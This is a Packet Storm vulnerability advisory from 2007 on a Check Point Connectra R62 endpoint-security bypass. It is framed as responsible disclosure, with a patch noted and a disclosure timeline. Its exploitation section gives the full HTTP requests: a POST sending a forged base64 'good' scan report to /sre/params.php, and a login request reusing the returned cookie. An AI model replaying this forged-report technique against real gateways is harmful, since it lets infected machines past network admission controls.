exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

checkpoint-bypass.txt

checkpoint-bypass.txt
Posted Jan 24, 2007
Authored by Nir Goldshlager, Roni Bachar

Check Point Connectra End Point is susceptible to a bypass flaw.

tags | exploit, bypass
SHA-256 | 9c4bd92a1c99cc73f4cff85e7926a401ced28074124ee8b438d2858e5df2c682

checkpoint-bypass.txt

Change Mirror Download
I. INTRODUCTION

Check Point Connectra is a complete Web Security Gateway that provides
SSL VPN access and comprehensive endpoint and integrated intrusion
prevention
Security in a single unified remote access solution. By combining both SSL
VPN connectivity and security in one solution, organizations can effectively
deploy SSL VPNs Safely and securely to a diverse set of remote users while
ensuring the confidentiality and integrity of information that is critical
to the success of any business.

For more Information please refer to:
http://www.checkpoint.com/products/connectra/index.html

II. DESCRIPTION

One of the major things in Check Point Connectra is Comprehensive endpoint
security.
Before a client connects to the internal network a test is being done on the
client to check if there is any security hazard on his computer. If a hazard
is detected the user is prompted with the hazard details and asked to run
the test again before getting the ability to login to the network.

A bypass to this test has been detected by Roni Bachar and Nir Goldshlager.
A user with a security hazard or a Trojan can bypass the end point security
tests and login to the network with a security hazard on his computer. The
bypass is being done by sending a "good" report to the /sre/params.php page
after sending the report a set cookie will be send from the server to the
client. This cookie can be used to bypass the endpoint security findings.

The bypass was detected on the latest version of checkpoint connectra R62.

III. EXPLOITATION

The vulnerability can be exploited by doing the following stages:

Sending a post request as followed:

POST https://serverip/sre/params.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: ICS_Secure
Host: serverip
Content-Length: 251
Cache-Control: no-cache
Cookie: ICS_Test_Cookie=1

Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM
TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y
WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L
1NyZVNjYW5SZXBvcnQ+Cg==


After sending the request a Set-Cookie will be received from the Check Point
Connectra server

HTTP/1.1 200 OK
Date: Fri, 15 Dec 2006 17:16:19 GMT
Server: CPWS
Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d; expires=Tue, 13 Sep
2016 17:16:19 GMT; path=/; secure
Content-Length: 0
Content-Type: text/html

This ICSCookie is needed to be enteredd into the next request

GET https://serverip/Login/Login?LangCode= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322; .NET CLR 2.0.50727)
Host: serverip
Connection: Keep-Alive
Cookie: CheckCookieSupport=1; ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d


IV. WORKAROUND

Check point released a patch for this vulnerability.


V. DISCLOSURE TIMELINE

20.12.06 First Identification of the flaw
24.12.06 Reporting the flaw to checkpoint
27.12.06 Meeting checkpoint security stuff
22.01.07 Publishing the vulnerability.
22.01.07 Checkpoint Released a patch for the vulnerability

VI. CREDITS

The vulnerability was discovered by Roni Bachar and Nir Goldshlager.




Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close